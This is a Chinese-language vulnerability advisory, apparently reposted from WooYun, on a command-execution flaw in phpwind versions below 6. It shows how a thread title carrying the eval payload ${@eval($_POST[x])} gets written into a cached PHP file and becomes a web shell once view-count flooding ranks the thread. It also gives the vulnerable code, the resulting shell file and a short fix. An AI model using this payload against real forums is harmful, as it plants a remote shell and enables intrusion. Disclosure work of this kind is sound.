记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

phpwind < v6 版本命令执行漏洞

2016-02-08 18:25

phpwind/sort.php 会定期每天处理一次帖子的浏览量、回复量、精华版排序

代码直接使用savearray将数据库查询出来的内容写入php文件,savearray出来的参数,都使用"双引号来包含,所以可以利用变量来执行任意命令

code 区域
elseif($action=='article'){

$cachetime=@filemtime(D_P."data/bbscache/article_sort.php");

if(!$per || $timestamp-$cachetime>$per*3600){

$_SORTDB=$_sort=array();

$query=$db->query("SELECT t.tid,t.subject,t.replies,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.replies DESC LIMIT $cachenum");

while($topic=$db->fetch_array($query)){

if($topic['replies']){

$topic['subject']=substrs($topic['subject'],25);

$_sort[]=$topic;

}

}

$_SORTDB['reply']=$_sort;



$_sort=array();

$query=$db->query("SELECT t.tid,t.subject,t.hits,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.hits DESC LIMIT $cachenum");

while($topic=$db->fetch_array($query)){

if($topic['hits']){

$topic['subject']=substrs($topic['subject'],25);

$_sort[]=$topic;

}

}

$_SORTDB['hit']=$_sort;

$_sort=array();

$query=$db->query("SELECT t.tid,t.subject,t.digest,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.digest<>'0' AND t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.lastpost DESC LIMIT $cachenum");

while($topic=$db->fetch_array($query)){

$topic['subject']=substrs($topic['subject'],25);

$_sort[]=$topic;

}

$_SORTDB['digest']=$_sort;

$ARTICLEDB=savearray('_ARTICLEDB',$_SORTDB);



writeover(D_P.'data/bbscache/article_sort.php',"<?php\r\n".$ARTICLEDB.'?>');

}



发表一个帖子:标题如下

code 区域
${@eval($_POST[x])}XXXX

article_title.jpg





再开一个多线程(100线程,几分钟就可以了),请求访问那个帖子,直到帖子的访问量排入前20

code 区域
function savearray($name,$array){

$arraydb="\$$name=array(\r\n\t\t";

foreach($array as $key=>$value){

$arraydb.="'".$key."'=>\narray(\r\n\t\t\t";

foreach($value as $value1){

$arraydb.='array(';

foreach($value1 as $value2){

$arraydb.='"'.addslashes($value2).'",';

}

$arraydb.="),\r\n\t\t\t";

}

$arraydb.="),\r\n\t\t";

}

$arraydb.=");\r\n";

return $arraydb;



第二天,生成统计排行的时候,shell就躺在了 /data/bbscache/article_sort.php

三个白帽实际演示:http://**.**.**.**/data/bbscache/article_sort.php

article_shell.jpg

漏洞证明:

/data/bbscache/article_sort.php

code 区域
<?php

$_ARTICLEDB=array(

'reply'=>

array(

array("1","${@eval($_POST[x])}XXXX ..","5732","2",),

array("10","DDDDDDDDDDDDDDDDD","20","2",),

array("7","HI Everybody ( b)ம","8","2",),

array("3","hello","5","2",),

array("5","䜲⊔","3","2",),

array("2","test","3","2",),

array("9","AAAAAAAAAAAAA","2","2",),

array("6","ִА⫢,"1","2",),

array("8","⵽բ萾ዢ,"1","2",),

),

'hit'=>

array(

array("1","${@eval($_POST[x])}XXXX ..","11382","2",),

array("2","test","3235","2",),

array("3","hello","985","2",),

array("5","䜲⊔","331","2",),

array("7","HI Everybody ( b)ம","123","2",),

修复方案:

使用单引号处理来自客户端可控的变量


知识来源: www.wooyun.org/bugs/wooyun-2016-0153256

阅读:146522 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“phpwind < v6 版本命令执行漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云